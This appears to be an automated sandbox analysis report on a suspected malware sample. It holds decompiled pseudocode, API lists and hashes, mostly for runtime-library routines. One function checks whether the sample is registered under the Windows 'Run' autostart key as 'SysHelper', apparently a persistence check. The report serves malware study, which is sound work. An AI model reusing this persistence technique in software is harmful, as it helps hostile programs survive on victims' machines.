__vfwprintf_p.LIBCMT ref: 00454B27

Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF

vswprintf.LIBCMT ref: 00454B5D
RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
MessageBoxA.USER32 ref: 00454BD3

Strings

OPENSSL, xrefs: 00454B77
OpenSSL: FATAL, xrefs: 00454BC7

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
String ID: OPENSSL$OpenSSL: FATAL
API String ID: 277090408-1348657634
Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B

Uniqueness

Uniqueness Score: -1.00%

Function 00412360 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 61
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00412360() {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v2066;
				short _v2068;
				short _v4116;
				signed int _t35;

				E0042F7C0(0x1010);
				_v8 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0xf003f,  &_v8) == 0) {
					_v12 = 1;
					_v2068 = 0;
					E0042B420( &_v2066, 0, 0x7fe);
					_v20 = 0x400;
					RegQueryValueExW(_v8, L"SysHelper", 0,  &_v12,  &_v2068,  &_v20);
					RegCloseKey(_v8);
					_v16 = 0;
					lstrcpyW( &_v4116,  *(CommandLineToArgvW(GetCommandLineW(),  &_v16)));
					_t35 = lstrcmpW( &_v4116,  &_v2068);
					asm("sbb eax, eax");
					return  ~_t35 + 1;
				} else {
					return 0;
				}
			}

0x00412368
0x00412370
0x00412391
0x0041239b
0x004123a8
0x004123b6
0x004123be
0x004123de
0x004123e7
0x004123ed
0x0041240e
0x00412422
0x0041242a
0x00412430
0x00412393
0x00412398
0x00412398

APIs

RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
_memset.LIBCMT ref: 004123B6
RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004123DE
RegCloseKey.ADVAPI32(?), ref: 004123E7
GetCommandLineW.KERNEL32 ref: 004123F4
CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004123FF
lstrcpyW.KERNEL32 ref: 0041240E
lstrcmpW.KERNEL32(?,?), ref: 00412422

Strings

SysHelper, xrefs: 004123D6
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0041237F

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
API String ID: 122392481-4165002228
Opcode ID: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction ID: c603cf62551caa9c06587f3e6ced3ee16b2371f56cdaae2afb18e0be874d4686
Opcode Fuzzy Hash: ffdeb467f25692adb2f41c7a5be08654f874d2c95d3133ace75c87d70b3a0200
Instruction Fuzzy Hash: D7112C7194020DABDF50DFA0DC89FEE77BCBB04705F0445A5F509E2151DBB45A889F94

Uniqueness

Uniqueness Score: -1.00%

Function 00423576 Relevance: 16.8, APIs: 11, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00423576(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t81;
				signed int _t83;
				void* _t84;
				signed int _t87;
				signed int _t89;
				signed int _t92;
				void* _t94;
				signed int _t95;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				void* _t106;
				signed int _t108;
				void* _t109;
				signed int _t111;
				signed int _t117;
				signed int _t126;
				signed int _t132;
				signed int* _t135;
				signed int _t139;
				signed int _t141;
				void* _t143;
				void* _t155;
				signed int _t158;
				signed int _t167;
				signed int* _t171;
				signed int _t173;
				signed int _t177;
				signed int _t178;
				intOrPtr _t180;
				signed int _t182;
				void* _t184;
				void* _t186;
				signed int _t187;
				signed int _t188;

				_t167 = __edx;
				_t171 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_t195 = _t171;
				if(_t171 != 0) {
					E0042B420(_t171, 0xff, 0x24);
					_t177 = _a8;
					__eflags = _t177;
					if(__eflags == 0) {
						goto L1;
					} else {
						__eflags =  *(_t177 + 4);
						if(__eflags > 0) {
							L9:
							_t84 = 7;
							__eflags =  *(_t177 + 4) - _t84;
							if(__eflags < 0) {
								L12:
								E0042FB64(0, _t167, _t171, _t177, __eflags);
								_t87 = E0042F803( &_v12);
								__eflags = _t87;
								if(_t87 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E004242FD(0, _t167);
									asm("int3");
									_push(_t177);
									_t180 = _v52;
									_t89 =  *(_t180 + 0xc);
									__eflags = _t89 & 0x00000083;
									if(__eflags != 0) {
										_push(0);
										_t139 = _a8;
										 *(_t180 + 0xc) = _t89 & 0xffffffef;
										_push(_t171);
										__eflags = _t139 - 1;
										if(_t139 != 1) {
											_t173 = _a4;
										} else {
											_t173 = _a4 + E004230C5(_t139, _t167, _t180, _t180);
											_t139 = 0;
										}
										E0042836B(_t167, _t180);
										_t92 =  *(_t180 + 0xc);
										__eflags = _t92;
										if(_t92 >= 0) {
											__eflags = _t92 & 0x00000001;
											if((_t92 & 0x00000001) != 0) {
												__eflags = _t92 & 0x00000008;
												if((_t92 & 0x00000008) != 0) {
													__eflags = _t92 & 0x00000400;
													if((_t92 & 0x00000400) == 0) {
														 *((intOrPtr*)(_t180 + 0x18)) = 0x200;
													}
												}
											}
										} else {
											 *(_t180 + 0xc) = _t92 & 0xfffffffc;
										}
										_push(_t139);
										_push(_t173);
										_push(E0042816B(_t180));
										_t94 = E0042818F(_t139, _t167, _t173, _t180, __eflags);
										__eflags = _t94 - 0xffffffff;
										_t78 = _t94 != 0xffffffff;
										__eflags = _t78;
										_t79 = (0 | _t78) - 1; // -1
										_t95 = _t79;
									} else {
										_t98 = E00425208(__eflags);
										 *_t98 = 0x16;
										_t95 = _t98 | 0xffffffff;
									}
									return _t95;
								} else {
									_t100 = E0042F82D( &_v16);
									__eflags = _t100;
									if(_t100 != 0) {
										goto L45;
									} else {
										_t102 = E0042F857( &_v8);
										__eflags = _t102;
										if(_t102 != 0) {
											goto L45;
										} else {
											_t11 = _t177 + 4; // 0x858d0050
											_t141 =  *_t11;
											_t155 =  *_t177;
											__eflags = _t141;
											if(__eflags < 0) {
												L23:
												_t83 = E0042F939(_t171, _t177);
												__eflags = _t83;
												if(_t83 == 0) {
													__eflags = _v12 - _t83;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t182 = _t167;
														asm("cdq");
														_t143 =  *_t171 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t171);
														_t126 = E0042FBB4(_t141, _t171, _t177, __eflags);
														__eflags = _t126;
														if(_t126 == 0) {
															goto L27;
														} else {
															asm("cdq");
															_t171[8] = 1;
															asm("cdq");
															_t143 =  *_t171 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t167;
															_t182 = _t167;
														}
													}
													_t105 = E004305A0(_t143, _t182, 0x3c, 0);
													 *_t171 = _t105;
													__eflags = _t105;
													if(_t105 < 0) {
														_t143 = _t143 + 0xffffffc4;
														 *_t171 = _t105 + 0x3c;
														asm("adc esi, 0xffffffff");
													}
													_t106 = E004304F0(_t143, _t182, 0x3c, 0);
													_t144 = _t167;
													asm("cdq");
													_t184 = _t106 + _t171[1];
													asm("adc ebx, edx");
													_t108 = E004305A0(_t184, _t167, 0x3c, 0);
													_t171[1] = _t108;
													__eflags = _t108;
													if(_t108 < 0) {
														_t184 = _t184 + 0xffffffc4;
														_t171[1] = _t108 + 0x3c;
														asm("adc ebx, 0xffffffff");
													}
													_t109 = E004304F0(_t184, _t144, 0x3c, 0);
													_t145 = _t167;
													asm("cdq");
													_t186 = _t109 + _t171[2];
													asm("adc ebx, edx");
													_t111 = E004305A0(_t186, _t167, 0x18, 0);
													_t171[2] = _t111;
													__eflags = _t111;
													if(_t111 < 0) {
														_t186 = _t186 + 0xffffffe8;
														_t171[2] = _t111 + 0x18;
														asm("adc ebx, 0xffffffff");
													}
													_t158 = E004304F0(_t186, _t145, 0x18, 0);
													__eflags = _t167;
													if(__eflags < 0) {
														L43:
														_t171[3] = _t171[3] + _t158;
														asm("cdq");
														_t187 = 7;
														_t117 = _t171[3];
														_t171[6] = (_t171[6] + 7 + _t158) % _t187;
														__eflags = _t117;
														if(_t117 > 0) {
															goto L38;
														} else {
															_t171[4] = 0xb;
															_t171[3] = _t117 + 0x1f;
															_t55 = _t158 + 0x16d; // 0x16d
															_t171[7] = _t171[7] + _t55;
															_t171[5] = _t171[5] - 1;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t188 = 7;
															_t39 =  &(_t171[3]);
															 *_t39 = _t171[3] + _t158;
															__eflags =  *_t39;
															_t171[6] = (_t171[6] + _t158) % _t188;
															L38:
															_t42 =  &(_t171[7]);
															 *_t42 = _t171[7] + _t158;
															__eflags =  *_t42;
														} else {
															__eflags = _t158;
															if(_t158 == 0) {
																__eflags = _t167;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t158;
																		if(_t158 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t155 - _v8;
													_v20 = _t141;
													_t83 = E0042F939(_t171,  &_v24);
													__eflags = _t83;
													if(_t83 == 0) {
														__eflags = _v12 - _t83;
														if(__eflags == 0) {
															L39:
															_t83 = 0;
														} else {
															_push(_t171);
															_t132 = E0042FBB4(_t141, _t171, _t177, __eflags);
															__eflags = _t132;
															if(_t132 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t83 = E0042F939(_t171,  &_v24);
																__eflags = _t83;
																if(_t83 == 0) {
																	_t171[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t155 - 0x3f480;
													if(_t155 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t177 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t135 = E00425208(__eflags);
								_t178 = 0x16;
								 *_t135 = _t178;
								goto L2;
							} else {
								__eflags =  *_t177;
								if(__eflags >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t81 = E00425208(_t195);
					_t178 = 0x16;
					 *_t81 = _t178;
					E004242D2();
					L2:
					_t83 = _t178;
					L3:
					return _t83;
				}
			}

0x00423576
0x00423581
0x00423584
0x00423587
0x0042358a
0x0042358d
0x0042358f
0x004235b1
0x004235b6
0x004235bc
0x004235be
0x00000000
0x004235c0
0x004235c0
0x004235c3
0x004235d7
0x004235d9
0x004235da
0x004235dd
0x004235e9
0x004235e9
0x004235f2
0x004235f8
0x004235fa
0x004237e5
0x004237e5
0x004237e6
0x004237e7
0x004237e8
0x004237e9
0x004237ea
0x004237ef
0x004237f3
0x004237f4
0x004237f7
0x004237fa
0x004237fc
0x0042380e
0x0042380f
0x00423815
0x00423818
0x00423819
0x0042381c
0x0042382e
0x0042381e
0x00423827
0x00423829
0x0042382b
0x00423832
0x00423837
0x0042383b
0x0042383d
0x00423847
0x00423849
0x0042384b
0x0042384d
0x0042384f
0x00423854
0x00423856
0x00423856
0x00423854
0x0042384d
0x0042383f
0x00423842
0x00423842
0x0042385d
0x0042385e
0x00423866
0x00423867
0x00423871
0x00423874
0x00423874
0x00423879
0x00423879
0x004237fe
0x004237fe
0x00423803
0x00423809
0x00423809
0x0042387e
0x00423600
0x00423604
0x0042360a
0x0042360c
0x00000000
0x00423612
0x00423616
0x0042361c
0x0042361e
0x00000000
0x00423624
0x00423624
0x00423624
0x00423627
0x00423629
0x0042362b
0x0042369b
0x0042369d
0x004236a4
0x004236a6
0x004236ac
0x004236af
0x004236de
0x004236e0
0x004236e3
0x004236e8
0x004236e9
0x004236eb
0x004236b1
0x004236b1
0x004236b2
0x004236b8
0x004236ba
0x00000000
0x004236bc
0x004236c2
0x004236c5
0x004236d0
0x004236d3
0x004236d5
0x004236d7
0x004236da
0x004236da
0x004236ba
0x004236f3
0x004236f8
0x004236fa
0x004236fc
0x00423701
0x00423704
0x00423706
0x00423706
0x0042370f
0x00423716
0x0042371b
0x0042371c
0x00423722
0x00423726
0x0042372b
0x0042372e
0x00423730
0x00423735
0x00423738
0x0042373b
0x0042373b
0x00423744
0x0042374b
0x00423750
0x00423751
0x00423757
0x0042375b
0x00423760
0x00423763
0x00423765
0x0042376a
0x0042376d
0x00423770
0x00423770
0x0042377e
0x00423780
0x00423782
0x004237af
0x004237b5
0x004237bc
0x004237bd
0x004237c0
0x004237c3
0x004237c6
0x004237c8
0x00000000
0x004237ca
0x004237cd
0x004237d4
0x004237d7
0x004237dd
0x004237e0
0x004237e0
0x00423784
0x00423784
0x0042378a
0x00423791
0x00423792
0x00423795
0x00423795
0x00423795
0x00423798
0x0042379b
0x0042379b
0x0042379b
0x0042379b
0x00423786
0x00423786
0x00423788
0x004237a5
0x004237a7
0x004237a9
0x00000000
0x004237ab
0x004237ab
0x004237ad
0x00000000
0x00000000
0x004237ad
0x004237a9
0x00000000
0x00000000
0x00000000
0x00423788
0x00423784
0x00000000
0x00423782
0x0042362d
0x0042362d
0x00423637
0x0042363a
0x00423641
0x00423643
0x00423647
0x0042364a
0x00423651
0x00423653
0x00423659
0x0042365c
0x0042379e
0x0042379e
0x00423662
0x00423662
0x00423663
0x00423669
0x0042366b
0x00000000
0x00423671
0x00423674
0x00423675
0x0042367c
0x00423680
0x00423687
0x00423689
0x0042368f
0x00000000
0x0042368f
0x00423689
0x0042366b
0x0042365c
0x0042362f
0x0042362f
0x00423635
0x00000000
0x00000000
0x00000000
0x00000000
0x00423635
0x0042362d
0x00000000
0x0042362b
0x0042361e
0x0042360c
0x004235df
0x004235df
0x00000000
0x004235e1
0x004235e1
0x004235e7
0x00000000
0x00000000
0x00000000
0x00000000
0x004235e7
0x004235df
0x004235c5
0x004235c5
0x004235cb
0x004235cb
0x004235d2
0x004235d3
0x00000000
0x004235c7
0x004235c7
0x004235c9
0x00000000
0x00000000
0x00000000
0x00000000
0x004235c9
0x004235c5
0x004235c3
0x00423591
0x00423591
0x00423591
0x00423598
0x00423599
0x0042359b
0x004235a0
0x004235a0
0x004235a2
0x004235a8
0x004235a8

APIs

_memset.LIBCMT ref: 004235B1

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

__gmtime64_s.LIBCMT ref: 0042364A
__gmtime64_s.LIBCMT ref: 00423680
__gmtime64_s.LIBCMT ref: 0042369D
__allrem.LIBCMT ref: 004236F3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
__allrem.LIBCMT ref: 00423726
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
__allrem.LIBCMT ref: 0042375B
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
__invoke_watson.LIBCMT ref: 004237EA

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798

Uniqueness

Uniqueness Score: -1.00%

Function 00418000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00418000(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				intOrPtr _t99;
				signed int _t102;
				signed int _t107;
				intOrPtr* _t108;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr* _t116;
				intOrPtr _t124;
				intOrPtr* _t136;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t160;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t183;
				intOrPtr _t185;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				intOrPtr _t197;
				intOrPtr* _t198;
				intOrPtr* _t199;
				intOrPtr* _t200;
				intOrPtr* _t201;
				intOrPtr* _t204;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				intOrPtr* _t213;
				intOrPtr* _t219;
				void* _t226;

				_push(__ecx);
				_t219 = __ecx;
				_t213 = _a4;
				_t188 =  *((intOrPtr*)(__ecx + 0x10));
				if(_t188 < _t213) {
					L102:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *_t188;
				} else {
					_t183 = _a16;
					_t99 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t99 < _t183) {
						goto L102;
					} else {
						_t188 = _t188 - _t213;
						_t207 =  <  ? _t188 : _a8;
						_a8 = _t207;
						_t185 =  <  ? _t99 - _t183 : _a20;
						_t102 =  *((intOrPtr*)(__ecx + 0x10)) - _t207;
						_v8 = _t102;
						if((_t102 | 0xffffffff) - _t185 <= _v8) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L102;
						} else {
							_t189 = _t188 - _t207;
							_t107 = _v8 + _t185;
							_a20 = _t189;
							_v8 = _t107;
							if( *((intOrPtr*)(__ecx + 0x10)) < _t107) {
								_push(0);
								E00415810(_t185, __ecx, _t213, _t107);
								_t189 = _a20;
								_t207 = _a8;
							}
							_t108 = _a12;
							if(_t219 == _t108) {
								__eflags = _t185 - _t207;
								if(_t185 > _t207) {
									__eflags = _a16 - _t213;
									if(_a16 > _t213) {
										__eflags = _t213 + _t207 - _a16;
										_t110 =  *((intOrPtr*)(_t219 + 0x14));
										if(_t213 + _t207 > _a16) {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_t190 = _t219;
											} else {
												_t190 =  *_t219;
											}
											__eflags = _t207;
											if(_t207 != 0) {
												__eflags = _a12 + _a16;
												E004205A0(_t190 + _t213, _a12 + _a16, _t207);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t111 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t111 - 0x10;
											if(_t111 < 0x10) {
												_t191 = _t219;
											} else {
												_t191 =  *_t219;
											}
											_t112 = _a20;
											__eflags = _t112;
											if(_t112 != 0) {
												__eflags = _t191 + _t213 + _t185;
												E004205A0(_t191 + _t213 + _t185, _a12 + _t213 + _t207, _t112);
												_t226 = _t226 + 0xc;
											}
											_t113 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t113 - 0x10;
											if(_t113 < 0x10) {
												_t208 = _t219;
											} else {
												_t208 =  *_t219;
											}
											_t192 = _a8;
											_t115 = _t185 - _t192;
											__eflags = _t115;
											if(_t115 != 0) {
												_push(_t115);
												_push(_a12 + _a16 + _t185);
												_t124 = _t213 + _t208 + _t192;
												__eflags = _t124;
												goto L96;
											}
										} else {
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a4 = _t219;
											} else {
												_a4 =  *_t219;
												_t207 = _a8;
											}
											__eflags = _t110 - 0x10;
											if(_t110 < 0x10) {
												_a12 = _t219;
											} else {
												_a12 =  *_t219;
											}
											__eflags = _t189;
											if(_t189 != 0) {
												__eflags = _a12 + _t213 + _t185;
												E004205A0(_a12 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
												_t207 = _a8;
												_t226 = _t226 + 0xc;
											}
											_t197 =  *((intOrPtr*)(_t219 + 0x14));
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t136 = _t219;
											} else {
												_t136 =  *_t219;
											}
											__eflags = _t197 - 0x10;
											if(_t197 < 0x10) {
												_t198 = _t219;
											} else {
												_t198 =  *_t219;
											}
											__eflags = _t185;
											if(_t185 != 0) {
												_push(_t185);
												_push(_t136 - _t207 + _a16 + _t185);
												_t124 = _t198 + _t213;
												goto L96;
											}
										}
									} else {
										_t148 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a4 = _t219;
										} else {
											_a4 =  *_t219;
											_t207 = _a8;
										}
										__eflags = _t148 - 0x10;
										if(_t148 < 0x10) {
											_a8 = _t219;
										} else {
											_a8 =  *_t219;
										}
										__eflags = _t189;
										if(_t189 != 0) {
											__eflags = _a8 + _t213 + _t185;
											E004205A0(_a8 + _t213 + _t185, _a4 + _t213 + _t207, _t189);
											_t226 = _t226 + 0xc;
										}
										_t149 =  *((intOrPtr*)(_t219 + 0x14));
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t210 = _t219;
										} else {
											_t210 =  *_t219;
										}
										__eflags = _t149 - 0x10;
										if(_t149 < 0x10) {
											_t199 = _t219;
										} else {
											_t199 =  *_t219;
										}
										__eflags = _t185;
										if(_t185 != 0) {
											_push(_t185);
											_push(_a16 + _t210);
											_t124 = _t199 + _t213;
											goto L96;
										}
									}
								} else {
									_t160 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_a4 = _t219;
									} else {
										_a4 =  *_t219;
									}
									__eflags = _t160 - 0x10;
									if(_t160 < 0x10) {
										_t200 = _t219;
									} else {
										_t200 =  *_t219;
									}
									__eflags = _t185;
									if(_t185 != 0) {
										__eflags = _a4 + _a16;
										E004205A0(_t200 + _t213, _a4 + _a16, _t185);
										_t207 = _a8;
										_t226 = _t226 + 0xc;
									}
									_t161 =  *((intOrPtr*)(_t219 + 0x14));
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_a8 = _t219;
									} else {
										_a8 =  *_t219;
									}
									__eflags = _t161 - 0x10;
									if(_t161 < 0x10) {
										_t201 = _t219;
									} else {
										_t201 =  *_t219;
									}
									_t162 = _a20;
									__eflags = _t162;
									if(_t162 != 0) {
										_push(_t162);
										_push(_a8 + _t213 + _t207);
										_t124 = _t201 + _t213 + _t185;
										L96:
										_push(_t124);
										E004205A0();
										goto L97;
									}
								}
							} else {
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a8 = _t219;
								} else {
									_a8 =  *_t219;
									_t213 = _a4;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_a20 = _t219;
								} else {
									_a20 =  *_t219;
									_t213 = _a4;
								}
								if(_t189 != 0) {
									E004205A0(_a20 + _t213 + _t185, _a8 + _t213 + _t207, _t189);
									_t108 = _a12;
									_t226 = _t226 + 0xc;
								}
								if( *((intOrPtr*)(_t108 + 0x14)) >= 0x10) {
									_t108 =  *_t108;
								}
								if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
									_t204 = _t219;
								} else {
									_t204 =  *_t219;
								}
								if(_t185 != 0) {
									E0042D8D0(_t204 + _t213, _t108 + _a16, _t185);
									L97:
								}
							}
							_t193 = _v8;
							 *(_t219 + 0x10) = _t193;
							if( *((intOrPtr*)(_t219 + 0x14)) < 0x10) {
								_t116 = _t219;
								 *((char*)(_t116 + _t193)) = 0;
								return _t116;
							} else {
								 *((char*)( *_t219 + _t193)) = 0;
								return _t219;
							}
						}
					}
				}
			}

0x00418003
0x00418005
0x00418008
0x0041800b
0x00418010
0x00418342
0x00418342
0x00418347
0x0041834c
0x0041834d
0x0041834e
0x0041834f
0x00418352
0x00418016
0x0041801a
0x0041801d
0x00418022
0x00000000
0x00418028
0x0041802b
0x0041802f
0x00418039
0x0041803c
0x00418042
0x00418044
0x0041804f
0x00418338
0x0041833d
0x00000000
0x00418055
0x00418058
0x0041805a
0x0041805c
0x0041805f
0x00418065
0x00418067
0x0041806c
0x00418071
0x00418074
0x00418074
0x00418077
0x0041807c
0x004180f3
0x004180f5
0x0041816a
0x0041816d
0x004181e3
0x004181e6
0x004181e9
0x0041825e
0x00418261
0x0041826a
0x00418263
0x00418265
0x00418265
0x0041826d
0x00418270
0x00418276
0x00418272
0x00418272
0x00418272
0x00418278
0x0041827a
0x0041827f
0x00418288
0x0041828d
0x00418290
0x00418290
0x00418293
0x00418296
0x00418299
0x004182a2
0x0041829b
0x0041829d
0x0041829d
0x004182a5
0x004182a8
0x004182ae
0x004182aa
0x004182aa
0x004182aa
0x004182b0
0x004182b3
0x004182b5
0x004182c3
0x004182c6
0x004182cb
0x004182cb
0x004182ce
0x004182d1
0x004182d4
0x004182dd
0x004182d6
0x004182d8
0x004182d8
0x004182e0
0x004182e3
0x004182e9
0x004182e5
0x004182e5
0x004182e5
0x004182eb
0x004182f0
0x004182f0
0x004182f2
0x004182f4
0x004182fd
0x00418302
0x00418302
0x00000000
0x00418302
0x004181eb
0x004181eb
0x004181ee
0x004181fa
0x004181f0
0x004181f2
0x004181f5
0x004181f5
0x004181fd
0x00418200
0x00418209
0x00418202
0x00418204
0x00418204
0x0041820c
0x0041820e
0x0041821e
0x00418221
0x00418226
0x00418229
0x00418229
0x0041822c
0x0041822f
0x00418232
0x00418238
0x00418234
0x00418234
0x00418234
0x0041823a
0x0041823d
0x00418243
0x0041823f
0x0041823f
0x0041823f
0x00418245
0x00418247
0x00418254
0x00418255
0x00418256
0x00000000
0x00418256
0x00418247
0x0041816f
0x0041816f
0x00418172
0x00418175
0x00418181
0x00418177
0x00418179
0x0041817c
0x0041817c
0x00418184
0x00418187
0x00418190
0x00418189
0x0041818b
0x0041818b
0x00418193
0x00418195
0x004181a5
0x004181a8
0x004181ad
0x004181ad
0x004181b0
0x004181b3
0x004181b6
0x004181bc
0x004181b8
0x004181b8
0x004181b8
0x004181be
0x004181c1
0x004181c7
0x004181c3
0x004181c3
0x004181c3
0x004181c9
0x004181cb
0x004181d6
0x004181d7
0x004181d8
0x00000000
0x004181d8
0x004181cb
0x004180f7
0x004180f7
0x004180fa
0x004180fd
0x00418106
0x004180ff
0x00418101
0x00418101
0x00418109
0x0041810c
0x00418112
0x0041810e
0x0041810e
0x0041810e
0x00418114
0x00418116
0x0041811b
0x00418124
0x00418129
0x0041812c
0x0041812c
0x0041812f
0x00418132
0x00418135
0x0041813e
0x00418137
0x00418139
0x00418139
0x00418141
0x00418144
0x0041814a
0x00418146
0x00418146
0x00418146
0x0041814c
0x0041814f
0x00418151
0x00418157
0x0041815f
0x00418163
0x00418304
0x00418304
0x00418305
0x00000000
0x00418305
0x00418151
0x0041807e
0x00418082
0x0041808e
